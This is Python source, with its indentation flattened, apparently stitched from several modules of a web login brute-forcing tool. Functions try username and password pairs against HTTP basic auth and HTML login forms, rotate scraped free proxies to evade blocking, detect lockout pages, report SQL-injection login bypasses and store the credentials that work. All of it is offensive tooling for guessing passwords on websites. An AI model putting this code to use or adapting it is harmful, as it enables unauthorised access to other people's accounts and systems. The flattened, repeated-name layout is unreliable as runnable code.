def submit(options, login_field, creds, result):
password, username = creds
if username in [x[1] for x in list(result.queue)]:
return True
try:
proc = Browser()
if options.proxy:
proxyAddr = list_choose_randomly(options.proxy)
proc.set_random_proxy(proxyAddr)
else:
proxyAddr = ""
resp = proc.open_url(options.url, auth=(username, password))
if resp.status_code == 401:
if options.verbose:
events.fail("['%s':%s'] <==> %s" %
(username, password, proxyAddr),
title=proc.get_title())
elif resp.status_code > 400:
events.error(
"[%s] ['%s': '%s']" % (proc.get_url(), username, password),
"%s" % resp.status_code)
else:
events.found(username, password, proc.get_title())
result.put([options.url, username, password])
except Exception as error:
events.error("%s" % (error), "BRUTE")
return False
finally:
proc.close()
def submit(url, options, tryCreds, result):
try:
proc = Browser()
events.info("Checking %s" % (url), "REAUTH")
proc.open(url)
loginInfo = find_login_form(proc.forms())
except Exception as error:
events.error("%s" % (error), "REAUTH")
sys.exit(1)
if not loginInfo:
events.error("No login form at %s" % (url), "REAUTH")
sys.exit(1)
else:
try:
options.url = url
loginbrute.submit(
# Reverse username + password. Dynamic submit in loginbrute
options,
loginInfo,
tryCreds[-2:][::-1],
result)
except Exception as error:
events.error("%s" % (error), "REAUTH")
sys.exit(1)
def checProxyConn(proxyAddr, target, result, verbose):
try:
proxyTest = Browser()
proxyTest.set_random_proxy(proxyAddr)
if verbose:
events.info("Testing %s" % (proxyAddr))
proxyTest.open_url(target)
if verbose:
events.success("Connected via %s" %(proxyAddr), "PROXY")
result.put(proxyAddr)
except KeyboardInterrupt:
events.error("Terminated by user", "STOPPED")
global set_break
set_break = True
except Exception as error:
if verbose:
events.error("[%s] [%s]" % (proxyAddr, error))
finally:
try:
proxyTest.close()
except:
pass
def find_login_request(options):
"""
Find and analysis login request from response
:param options: object = options of user
:return: False or list of string = login request information
"""
login_request = False
try:
from cores.browser import Browser
proc = Browser()
resp = proc.open_url(options.url)
"""
Check URL type. If Website directs to other URL,
options.url is website's panel
else: it is login url.
Example: options.url = site.com/wp-admin/ -> panel
site directs user to wp-login -> login URL
options.url = site.com/wp-login.php -> login URL
"""
if proc.get_url() != options.url:
events.info("Website moves to: ['%s']" % (proc.get_url()))
options.attack_mode = "--loginbrute"
if options.run_options["--verbose"]:
events.info("%s" % (proc.get_title()), "TITLE")
if resp.status_code == 401:
if "WWW-Authenticate" in resp.headers:
login_id = basic_http_request(resp.headers)
login_request = (login_id, ["Password", "User Name"])
if options.verbose:
events.info("HTTP GET login")
options.attack_mode = "--httpget"
else:
login_request = find_login_form(proc.forms())
options.txt = resp.content
except KeyboardInterrupt:
pass
except Exception as error:
events.error("%s" % (error), "TARGET")
sys.exit(1)
finally:
try:
proc.close()
except:
pass
return login_request
def checkProxyConnProvider(url = "https://free-proxy-list.net/"):
try:
events.info("Gathering proxies from %s" % (url))
getproxy = Browser()
getproxy.open_url(url)
events.success("Gathering proxies completed", "PROXY")
return getproxy.get_response()
except Exception as error:
events.error("%s" % (error), "PROXY")
sys.exit(1)
finally:
getproxy.close()
def submit(options, login_field, tryCred, result):
password, username = tryCred
if username in [x[1] for x in list(result.queue)]:
return True
from cores.browser import Browser
isLoginSuccess = "False"
try:
proc = Browser()
if options.proxy:
# Set proxy connect
proxy_address = list_choose_randomly(options.proxy)
proc.set_random_proxy(proxy_address)
else:
proxy_address = ""
proc.open_url(options.url)
_form = find_login_form(proc.forms())
if not _form:
options.block_text = proc.get_response(
) # TODO check if block text changes
if options.verbose:
isLoginSuccess = "blocked"
events.error("Get blocked", "BRUTE")
return False
else:
form_control, form_fields = _form
if options.verbose and login_field != _form:
events.info("Login form has been changed", "BRUTE")
resp = proc.form_submit(form_control, form_fields, tryCred)
from cores.analysis import get_response_diff
text_changed, source_changed = get_response_diff(
options.txt.decode('utf-8'), resp.content.decode('utf-8'))
"""
If there is no other login form, check all changes in response
If there is no login request from all new urls -> successfully
== > Behavior: Login fail, click here or windows.location = login_page
"""
# "Login form is still there. Oops"
if find_login_form(proc.forms()):
isLoginForm = True
else:
isLoginForm = False
if not isLoginForm:
for new_url in get_redirection(source_changed):
if not new_url.startswith("http") and not new_url.endswith(
options.exceptions()):
try:
from urllib.parse import urljoin
except ImportError:
from urlparse import urljoin
new_url = urljoin(options.url, new_url)
if new_url and get_domain(options.url) == get_domain(new_url):
proc.open_url(new_url)
if find_login_form(proc.forms()):
isLoginForm = True
break
else:
isLoginForm = False
if not isLoginForm:
"""
Check SQL Injection
1. SQL Injection
2. Login successfully: No SQLi + No Login form
"""
if check_sqlerror(proc.get_response()):
isLoginSuccess = "SQLi"
elif text_changed == source_changed and text_changed != options.block_text and options.block_text:
pass
else:
if resp.status_code >= 400:
isLoginSuccess = "error"
else:
isLoginSuccess = "True"
# "If we tried login form with username+password field"
else:
pass
return True
except Exception as error:
"""
Sometimes, web servers return error code because of bad configurations,
but our cred is true.
This code block showing information, for special cases
"""
isLoginSuccess = "exception"
events.error("%s" % (error), "BRUTE")
finally:
if isLoginSuccess == "SQLi":
events.success("SQL Injection bypass", "BRUTE")
events.info("['%s': '%s']" % (username, password))
elif isLoginSuccess == "error" and options.verbose:
if username:
events.error(
"['%s':'%s'] <--> %s" %
(username, password, proxy_address),
"%s" % (resp.status_code))
else:
events.error("[%s] <--> %s" % (password, proxy_address),
"%s" % (resp.status_code))
elif isLoginSuccess == "True":
if username:
events.found(username, password, proc.get_title())
result.put([options.url, username, password])
else:
events.found('', password, proc.get_title())
result.put([options.url, username, password])
elif isLoginSuccess == "False" and options.verbose:
if username:
events.fail(
"['%s':'%s'] <==> %s" %
(username, password, proxy_address), text_changed,
proc.get_title())
else:
events.fail("['%s'] <==> %s" % (password, proxy_address),
text_changed, proc.get_title())
proc.close()